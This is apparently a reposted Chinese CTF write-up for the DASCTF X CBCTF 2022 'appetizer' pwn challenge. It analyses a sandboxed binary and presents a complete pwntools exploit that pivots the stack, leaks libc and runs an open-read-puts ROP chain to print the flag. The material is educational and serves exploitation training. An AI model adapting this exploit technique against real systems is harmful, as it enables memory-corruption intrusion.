热门标签
热门文章
- 1iOS ANCS学习_pcba关闭ios app与ancs
- 2架构_ifar构架
- 3base64 <==> Buffer
- 4Beautiful Soup4库的使用_beautiful soup find class
- 5Python数据分析入门与实践_python数据分析从入门到实践
- 6Python OCR库比较:pyocr、pytesseract和python-tesseract_python ocr库哪个好
- 7pyqt5 qtchart 画出饼图_pyqt饼状图
- 8Jupyter在美团民宿的应用实践
- 9[Python从零到壹] 十四.机器学习之分类算法五万字总结全网首发(决策树、KNN、SVM、分类对比实验)_机器学习—分类算法的对比实验
- 10navicat连接postgresql报错 column “datlastsysoid“ does not exist_navicat error:column "datlastsoid" does not exist
当前位置: article > 正文
DASCTF X CBCTF 2022九月挑战赛 appetizer_cbctf2024wp re
作者:我家小花儿 | 2024-03-01 20:27:50
赞
踩
cbctf2024wp re
程序分析
- 开启了沙盒ban了execve
- fun函数可以覆盖到rbp的位置
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-01uqTxmY-1664893771226)(./图片/func.png)]](https://img-blog.csdnimg.cn/42d2a83604db4a34bbee71af109090b2.png)
- check函数会检查该位置是否有下面的字符串,小端序记得反过来写
- 白给了程序的一个地址(end),通过减去偏移拿到程序的基地址
- 调试发现最后一个read可以改写rbp以及rsp
思路
- func函数可以让我们改写rbp,且通过最后一个read可以实现任意地址写入0x10的数据,但是开启了pie,且我们是后面才拿到的程序基地址且禁止了系统调用,所以打orw
- 将rop链布置到end中,泄露出libc地址,通过最后一个read进行栈迁移
- 在第一个链中输出完之后再执行一个read向end写入第二个rop链
- 第二个rop链就是常规的open,read,puts了
注:orw:在这里指代程序开启了orw,采用open打开flag再写入内存,最后输出的利用
exp
from pwn import * context.update(os='linux',arch='amd64',log_level='debug') #c=remote(b'node4.buuoj.cn',29430) c=process(b'./appetizer') libc=ELF(b'./libs/2.31-0ubuntu9_amd64/libc-2.31.so') elf=ELF(b'./appetizer') gdb.attach(c,''' ''') c.sendafter(b'identity\n',b'aaNameless') c.recvuntil(b'are:') addr_base=int(c.recv(14),16)-0x4050 pop_rdi=addr_base+0x14d3 pop_rsi_xxx=addr_base+0x14d1 leave_ret=addr_base+0x12d8 ret=addr_base+0x101a write_got=elf.got['write'] write_plt=elf.plt['write'] end=addr_base+0x4050 #length=0xe0 py=p64(pop_rdi)+p64(1)+p64(pop_rsi_xxx)+p64(addr_base+write_got)+p64(0)+p64(addr_base+write_plt)+p64(ret)*21+p64(addr_base+0x1428) #start_length=0xe0 py+=p64(end-8)+p64(leave_ret)+p64(0) #start_length=0xf8 py+=b'./flag\x00\x00' c.sendafter(b'on it\n',py) py=p64(end-8)+p64(leave_ret) c.sendafter(b'wish:\n',py) libc_base=u64(c.recv(6).ljust(8,b'\x00'))-libc.sym['write'] log.success("libc_base="+hex(libc_base)) pop_rsi=libc_base+0x27529 pop_rdx_xxx=libc_base+0x11c1e1 open_addr=libc_base+libc.sym['open'] read_addr=libc_base+libc.sym['read'] puts_addr=libc_base+libc.sym['puts'] orw=p64(pop_rdi)+p64(end+0xf8)+p64(pop_rsi)+p64(0)+p64(open_addr) orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(end+0x100)+p64(pop_rdx_xxx)+p64(0x40)+p64(0)+p64(read_addr) orw+=p64(pop_rdi)+p64(end+0x100)+p64(puts_addr) c.send(orw) c.send(b'a') c.interactive()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
others部分
- 官方给出的第一个wp利用的是csu,应该是为了控制rdx,但是我们泄露libc的时候最后一个read存入rdx的值为0x10完全够用所以就不用csu了
- 第一个rop链中的大量ret目的是抬高栈,原因是第一条链布置完执行的read的时候,我们又是在同一个地方写入内容导致改写了read后面返回时布置的内容,这会导致程序出错,如果把p64(ret)*21删除则,read后rip拿到的值就是我们第二条链中的3
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/176707
推荐阅读
相关标签
